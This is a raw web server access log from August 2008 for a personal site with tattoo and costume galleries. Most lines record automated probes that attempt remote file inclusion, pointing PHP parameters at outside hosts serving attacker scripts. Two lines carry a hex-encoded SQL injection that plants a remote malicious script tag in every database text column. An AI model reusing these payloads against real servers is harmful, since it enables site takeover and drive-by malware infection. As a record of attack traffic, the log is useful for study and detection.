75.85.187.165 - - [21/Aug/2008:21:24:18 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
87.230.21.231 - - [21/Aug/2008:21:25:36 -0500] "GET /logs/access_log.1206230400//modules/My_eGallery/public/displayCategory.php?basepath=http://whiteindo.com/.Insiderz/id.txt?%0D?? HTTP/1.1" 404 358 "-""libwww-perl/5.803"
87.230.21.231 - - [21/Aug/2008:21:25:36 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://whiteindo.com/.Insiderz/id.txt?%0D?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
87.230.21.231 - - [21/Aug/2008:21:25:37 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://whiteindo.com/.Insiderz/id.txt?%0D?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
72.52.143.147 - - [21/Aug/2008:21:25:46 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 302 "-""Mozilla/4.61 [en] (OS/2; U)"
72.52.143.147 - - [21/Aug/2008:21:25:46 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 307 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
216.75.35.118 - - [21/Aug/2008:21:26:51 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
216.75.35.118 - - [21/Aug/2008:21:26:51 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
216.75.35.118 - - [21/Aug/2008:21:26:52 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
216.75.35.118 - - [21/Aug/2008:21:26:59 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
85.13.194.38 - - [21/Aug/2008:21:27:37 -0500] "GET /logs/access_log.1194912000/index.php?go=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
85.13.194.38 - - [21/Aug/2008:21:27:38 -0500] "GET /index.php?go=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
85.13.194.38 - - [21/Aug/2008:21:27:38 -0500] "GET /logs/index.php?go=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
216.75.35.118 - - [21/Aug/2008:21:31:05 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
59.151.2.149 - - [21/Aug/2008:21:32:34 -0500] "GET /logs/access_log.1209600000/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
59.151.2.149 - - [21/Aug/2008:21:32:34 -0500] "GET /logs/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
59.151.2.149 - - [21/Aug/2008:21:32:34 -0500] "GET /logs/access_log.1203638400/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
202.70.83.4 - - [21/Aug/2008:21:32:34 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
202.70.83.4 - - [21/Aug/2008:21:32:35 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
202.70.83.4 - - [21/Aug/2008:21:32:37 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
202.70.83.4 - - [21/Aug/2008:21:32:37 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
216.75.35.118 - - [21/Aug/2008:21:35:05 -0500] "GET /logs/access_log.1203638400//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:21:37:25 -0500] "GET /logs/access_log.1194048000/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://utilz.info/a4? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
62.231.161.4 - - [21/Aug/2008:21:39:28 -0500] "GET /logs/access_log.1214179200///vwar/backup/errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:21:40:14 -0500] "GET /logs/access_log.1213488000///vwar/backup/errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.64"
202.181.99.47 - - [21/Aug/2008:21:40:19 -0500] "GET /logs/access_log.1214179200/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://utilz.info/a4? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
87.230.21.231 - - [21/Aug/2008:21:41:49 -0500] "GET /logs//atom.php5?page=http://whiteindo.com/.Insiderz/id.txt?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
87.230.21.231 - - [21/Aug/2008:21:41:49 -0500] "GET //atom.php5?page=http://whiteindo.com/.Insiderz/id.txt?%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
62.169.0.50 - - [21/Aug/2008:21:43:40 -0500] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://xposurexplosion.com/.../rid???? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
62.169.0.50 - - [21/Aug/2008:21:43:41 -0500] "GET /phpSecurePages/secure.php?&cfgProgDir=http://xposurexplosion.com/.../rid???? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
74.6.8.121 - - [21/Aug/2008:21:48:48 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.121 - - [21/Aug/2008:21:48:49 -0500] "GET /logs/access_log.1180396800 HTTP/1.0" 200 181982 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.231.161.4 - - [21/Aug/2008:21:50:56 -0500] "GET /logs/access_log.1214438400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:21:50:56 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:21:50:57 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.64"
87.230.21.231 - - [21/Aug/2008:21:53:23 -0500] "GET /logs/access_log.1214524800//atom.php5?page=http://whiteindo.com/.Insiderz/id.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
87.230.21.231 - - [21/Aug/2008:21:53:39 -0500] "GET /logs/access_log.1214438400//atom.php5?page=http://whiteindo.com/.Insiderz/id.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
59.183.121.92 - - [21/Aug/2008:21:56:09 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:09 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:13 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:13 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:14 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:15 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:24 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:30 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:31 -0500] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:31 -0500] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:31 -0500] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:31 -0500] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:32 -0500] "GET /costume/costm5.jpg HTTP/1.1" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:32 -0500] "GET /costume/costm6.jpg HTTP/1.1" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:32 -0500] "GET /costume/costm7.jpg HTTP/1.1" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:32 -0500] "GET /costume/costm8.jpg HTTP/1.1" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:33 -0500] "GET /costume/costm9.jpg HTTP/1.1" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:33 -0500] "GET /costume/costm10.jpg HTTP/1.1" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:33 -0500] "GET /costume/costm11.jpg HTTP/1.1" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:34 -0500] "GET /costume/costm12.jpg HTTP/1.1" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:50 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3346 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:50 -0500] "GET /costume/costm14.jpg HTTP/1.1" 200 10586 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:50 -0500] "GET /costume/costm13.jpg HTTP/1.1" 200 10011 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:50 -0500] "GET /costume/costm15.jpg HTTP/1.1" 200 9724 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:50 -0500] "GET /costume/costm16.jpg HTTP/1.1" 200 9075 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:51 -0500] "GET /costume/costm17.jpg HTTP/1.1" 200 9825 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:51 -0500] "GET /costume/costm18.jpg HTTP/1.1" 200 9364 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:51 -0500] "GET /costume/costm19.jpg HTTP/1.1" 200 10555 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:51 -0500] "GET /costume/costm21.jpg HTTP/1.1" 200 9439 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:51 -0500] "GET /costume/costm20.jpg HTTP/1.1" 200 57110 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:52 -0500] "GET /costume/costm22.jpg HTTP/1.1" 200 9434 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:52 -0500] "GET /costume/costm23.jpg HTTP/1.1" 200 9858 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:52 -0500] "GET /costume/costm24.jpg HTTP/1.1" 200 9990 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:57 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2155 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:58 -0500] "GET /costume/costume97%20copy.JPG HTTP/1.1" 200 15963 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:58 -0500] "GET /costume/costume98%20copy.JPG HTTP/1.1" 200 16840 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:58 -0500] "GET /costume/costume99%20copy.JPG HTTP/1.1" 200 16783 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:58 -0500] "GET /costume/costume101%20copy.JPG HTTP/1.1" 200 16134 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:59 -0500] "GET /costume/costume104.JPG HTTP/1.1" 200 60508 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:59 -0500] "GET /costume/costume102%20copy.JPG HTTP/1.1" 200 14869 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:56:59 -0500] "GET /costume/costume103%20copy.JPG HTTP/1.1" 200 16604 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
59.183.121.92 - - [21/Aug/2008:21:57:02 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
216.75.35.118 - - [21/Aug/2008:21:57:08 -0500] "GET /logs/access_log.1211500800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:21:58:31 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://utilz.info/a4? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:21:58:32 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://utilz.info/a4? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
59.125.211.84 - - [21/Aug/2008:21:59:42 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.apnic.net/index.html? HTTP/1.0" 404 312 "-""Mozilla/5.0"
204.15.10.22 - - [21/Aug/2008:22:00:13 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
204.15.10.22 - - [21/Aug/2008:22:00:13 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.810"
74.6.24.230 - - [21/Aug/2008:22:02:36 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.76.46 - - [21/Aug/2008:22:02:36 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.13.194.38 - - [21/Aug/2008:22:03:57 -0500] "GET /logs/access_log.1193011200/index.php?go=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
87.238.163.18 - - [21/Aug/2008:22:04:00 -0500] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
87.238.163.18 - - [21/Aug/2008:22:04:01 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
195.39.5.203 - - [21/Aug/2008:22:05:10 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
195.39.5.203 - - [21/Aug/2008:22:05:14 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
81.169.137.253 - - [21/Aug/2008:22:05:33 -0500] "GET ///?custompluginfile%5B%5D=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 200 1244 "-""libwww-perl/5.803"
81.169.137.253 - - [21/Aug/2008:22:05:34 -0500] "GET /logs///?custompluginfile%5B%5D=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 200 96222 "-""libwww-perl/5.803"
81.169.137.253 - - [21/Aug/2008:22:05:53 -0500] "GET ///?custompluginfile%5B%5D=http://vncownz.t35.com/scan/idnew.txt??? HTTP/1.1" 200 1244 "-""libwww-perl/5.803"
81.169.137.253 - - [21/Aug/2008:22:05:53 -0500] "GET /logs///?custompluginfile%5B%5D=http://vncownz.t35.com/scan/idnew.txt??? HTTP/1.1" 200 96222 "-""libwww-perl/5.803"
211.141.87.6 - - [21/Aug/2008:22:06:30 -0500] "GET /logs/access_log.1206230400/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
211.141.87.6 - - [21/Aug/2008:22:06:30 -0500] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
211.141.87.6 - - [21/Aug/2008:22:06:32 -0500] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 96216 "-""libwww-perl/5.805"
209.126.254.80 - - [21/Aug/2008:22:10:59 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
209.126.254.80 - - [21/Aug/2008:22:11:00 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.76"
211.141.87.6 - - [21/Aug/2008:22:11:26 -0500] "GET /logs/access_log.1208044800/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
123.8.201.34 - - [21/Aug/2008:22:11:46 -0500] "GET /logs/access_log.1208044800?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 122312 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; CNCDialer)"
123.8.201.34 - - [21/Aug/2008:22:11:47 -0500] "GET /logs/access_log.1208044800?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 122312 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; CNCDialer)"
64.185.237.191 - - [21/Aug/2008:22:11:57 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
64.185.237.191 - - [21/Aug/2008:22:11:57 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
77.221.130.9 - - [21/Aug/2008:22:12:25 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 200 96221 "-""libwww-perl/5.803"
77.221.130.9 - - [21/Aug/2008:22:12:26 -0500] "GET //?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
64.185.237.191 - - [21/Aug/2008:22:12:55 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
64.185.237.191 - - [21/Aug/2008:22:12:56 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
66.115.174.234 - - [21/Aug/2008:22:15:19 -0500] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
66.115.174.234 - - [21/Aug/2008:22:15:19 -0500] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
66.115.174.234 - - [21/Aug/2008:22:16:41 -0500] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
